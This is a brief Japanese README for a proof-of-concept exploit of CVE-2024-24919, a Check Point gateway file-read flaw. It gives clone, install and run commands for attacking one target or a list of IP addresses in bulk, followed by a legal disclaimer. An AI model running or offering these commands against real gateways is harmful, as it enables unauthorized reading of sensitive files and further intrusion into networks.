

この脆弱性により、認証されていないリモートの攻撃者は、Check Point Security Gatewayがインターネットに接続され、リモートアクセスVPNまたはモバイルアクセスソフトウェアブレードが有効になっている場合に、特定のファイルを読み取ることができます。この脆弱性を悪用すると、Security Gateway上の機密情報にアクセスでき、特定のシナリオでは、攻撃者が横方向に移動してドメイン管理者権限を取得する可能性があります。
git clone https://github.com/0nin0hanz0/CVE-2024-24919-PoC.git && cd CVE-2024-24919-PoCpip install -r requirements.txtpython exploit.py --target 192.128.0.1python exploit.py --file ips.txt (ips.txtファイルにはIPアドレス(例:192.168.1.1)を各行に1つずつ含めます。結果はresults.txtファイルに書き込まれます)このProof of Conceptソースコード(PoC)は、教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしにターゲットを攻撃するためにこのツールを使用することは違法です。適用されるすべての地域、州、連邦法を遵守するのはエンドユーザーの責任です。PoC開発者は、このプログラムの誤用または損害について一切の責任を負いません。
このPoCはGNU General Public Licenseの下でライセンスされています。